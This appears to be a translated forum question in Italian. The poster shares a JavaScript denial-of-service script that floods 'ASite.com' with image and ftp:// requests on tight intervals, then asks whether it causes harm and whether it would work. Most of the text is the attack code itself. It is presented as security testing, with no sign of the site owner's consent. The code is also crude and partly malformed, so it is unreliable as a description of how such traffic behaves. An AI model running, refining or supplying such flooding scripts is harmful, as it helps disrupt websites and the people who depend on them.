Dire che voglio testare la sicurezza di un sito e decido di inviare un attacco DOS contro di esso usando uno script javascript:
function imgflood(link, uri) {
var TARGET = link;
var URI = uri;
var pic = new Image();
var rand = Math.floor(Math.random() * 10000000);
pic.src = 'http:'+TARGET+URI+rand+'=val';
}
function DOSATTACK(link){
var domain = link;
setInterval(function(){
var i = 0;
var img = document.createElement('img');
img.setAttribute('src', 'ftp://' + domain + ':80/image' + new
Date().getTime() + i );
document.body.appendChild(img);
}, 1);
}
setInterval(function(){
imgflood("ASite.com","/index.html");
DOSATTACK("ASite.com");
}, 500);
Ho 2 domande: Uno, come potrei essere in grado di dire se sto facendo alcun danno, oltre al solo ritardo del sito (perché potrebbe essere il mio computer in ritardo perché sto facendo un sacco di immagini per il sito).
Due, questo script funzionerebbe del tutto o userebbe solo la mia larghezza di banda fino a quando il mio computer non si arrestasse. Ho notato che il mio computer potrebbe essere in ritardo, ma posso chiudere la scheda e accedere facilmente a un altro sito.